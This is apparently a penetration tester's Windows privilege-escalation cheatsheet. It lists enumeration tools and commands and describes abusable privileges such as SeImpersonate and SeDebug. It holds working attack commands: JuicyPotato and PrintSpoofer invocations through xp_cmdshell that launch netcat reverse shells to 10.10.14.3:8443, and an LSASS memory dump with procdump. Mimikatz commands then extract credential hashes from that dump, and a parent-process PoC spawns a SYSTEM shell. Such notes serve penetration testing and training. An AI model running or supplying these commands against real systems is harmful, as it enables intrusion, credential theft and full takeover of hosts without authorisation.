Windows

Manual Enumation Cheatsheet: PayloadAllTheThings

ToolDescription

C# project for performing a wide variety of local privilege escalation checks

WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. All of the checks are explained here

PowerShell script for finding common Windows privilege escalation vectors that rely on misconfigurations. It can also be used to exploit some of the issues found

C# version of PowerUp

PowerShell script for enumerating privilege escalation vectors written in PowerShell 2.0

SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information

Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.

Tool used for retrieving passwords stored on a local machine from web browsers, chat tools, databases, Git, email, memory dumps, PHP, sysadmin tools, wireless network configurations, internal Windows password storage mechanisms, and more

WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported

We will use several tools from Sysinternals in our enumeration including AccessChk, PipeList, and PsService

Network info

ipconfig /all
arp -a
route print

Protections (Antivirus, ...)

Windows Defender:

Get-MpComputerStatus

AppLocker

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Test AppLocker policy

Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone

Initial Enumeration

Windows Commands Reference

Running applications

tasklist /svc

Envarinment Variables

set

Configuration information (OS Version, Patch dates, ...)

systeminfo

HotFixes for known CVE's

Check restart time to also know the last update (possibly)

Other possible command instead of systeminfo

wmic qfe
Get-HotFix | ft -AutoSize

Installed Programs

wmic product get name
Get-WmiObject -Class Win32_Product |  select Name, Version

LaZagne to check for saved credentials

Display Running Processes

netstat -ano

We may find a vulnerable service only accessible to the local host (when logged on to the host) that we can exploit to escalate privileges.

Logged in users

query user

Current User

echo %USERNAME%

Current User Privileges

whoami /priv

Current User Group Information

whoami /groups

Get All Users

net user

Get All Groups

net localgroup

Details about a group

net localgroup administrators

Get Password Policy and Other Account Information

net accounts

Listing Named Pipes

pipelist.exe /accepteula

pipelist is from sysinternals, or powershell:

gci \\.\pipe\

Another tool from sysinternals again accesschk

accesschk.exe -w \pipe\* -v
accesschk.exe -accepteula -w \pipe\WindscribeService -v

PrivescCheck Script

Building powershell -ep bypass -c ". .\build\Build.ps1; Invoke-Build"

remember the dot sourcing!

Dangerous Permissions

SeNetworkLogonRight

Administrators, Authenticated Users

Determines which users can connect to the device from the network. This is required by network protocols such as SMB, NetBIOS, CIFS, and COM+.

SeRemoteInteractiveLogonRight

Administrators, Remote Desktop Users

This policy setting determines which users or groups can access the login screen of a remote device through a Remote Desktop Services connection. A user can establish a Remote Desktop Services connection to a particular server but not be able to log on to the console of that same server.

SeBackupPrivilege

Administrators

This user right determines which users can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system.

SeSecurityPrivilege

Administrators

This policy setting determines which users can specify object access audit options for individual resources such as files, Active Directory objects, and registry keys. These objects specify their system access control lists (SACL). A user assigned this user right can also view and clear the Security log in Event Viewer.

SeTakeOwnershipPrivilege

Administrators

This policy setting determines which users can take ownership of any securable object in the device, including Active Directory objects, NTFS files and folders, printers, registry keys, services, processes, and threads.

SeDebugPrivilege

Administrators

This policy setting determines which users can attach to or open any process, even a process they do not own. Developers who are debugging their applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides access to sensitive and critical operating system components.

SeImpersonatePrivilege

Administrators, Local Service, Network Service, Service

This policy setting determines which programs are allowed to impersonate a user or another specified account and act on behalf of the user.

SeLoadDriverPrivilege

Administrators

This policy setting determines which users can dynamically load and unload device drivers. This user right is not required if a signed driver for the new hardware already exists in the driver.cab file on the device. Device drivers run as highly privileged code.

SeRestorePrivilege

Administrators

This security setting determines which users can bypass file, directory, registry, and other persistent object permissions when they restore backed up files and directories. It determines which users can set valid security principals as the owner of an object.

Further information can be found here.

SeImpersonate or SeAssignPrimaryToken

JuicyPotato can be used to exploit the SeImpersonate or SeAssignPrimaryToken privileges via DCOM/NTLM reflection abuse.

Example of JuicyPotato from a MSSQL shell:

xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

-l is the COM server listening port, -p is the program to launch (cmd.exe), -a is the argument passed to cmd.exe, and -t is the createprocess call. We are telling the tool to try both the CreateProcessWithTokenW and CreateProcessAsUser functions, which need SeImpersonate or SeAssignPrimaryToken privileges respectively.

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. This blog post goes in-depth on the PrintSpoofer tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.

Example using PrintSpoofer from a MSSQL shell:

xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

Both the above examples need to enable xp_cmdshell. Impacket's MSSQL tool does this by simply running the command enable_xp_cmdshell

SeDebugPrivilege

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory. A good candidate is the Local Security Authority Subsystem Service (LSASS) process, which stores user credentials after a user logs on to a system.

procdump.exe -accepteula -ma lsass.exe lsass.dmp

we can load this in Mimikatz using the sekurlsa::minidump command. After issuing the sekurlsa::logonPasswords commands, we gain the NTLM hash of the local administrator account logged on locally.

Suppose we are unable to load tools on the target for whatever reason but have RDP access. In that case, we can take a manual memory dump of the LSASS process via the Task Manager by browsing to the Details tab, choosing the LSASS process, and selecting Create dump file.

Mimikats commands:

log
sekurlsa::minidump file.dmp
sekurlsa::logonpasswords

Transfer this PoC script over to the target system. Next we just load the script and run it with the following syntax [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,""). Note that we must add a third blank argument "" at the end for the PoC to work properly.

psgetsys.ps1; [MyProcess]::CreateProcessFromParent(612,"C:\Windows\System32\cmd.exe", "")

The PoC script has received an update. Please visit its GitHub repository and review its usage. https://github.com/decoder-it/psgetsystem

First, open an elevated PowerShell console (right-click, run as admin, and type in the credentials for the jordan user). Next, type tasklist to get a listing of running processes and accompanying PIDs.

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege grants a user the ability to take ownership of any "securable object", meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes.

Abusing this privilege is a bit of an edge case. Still, it is worth understanding in-depth, especially since we may also find ourselves in a scenario in an Active Directory environment where we can assign this right to a specific user that we can control and leverage it to read a sensitive file on a file share.

Last updated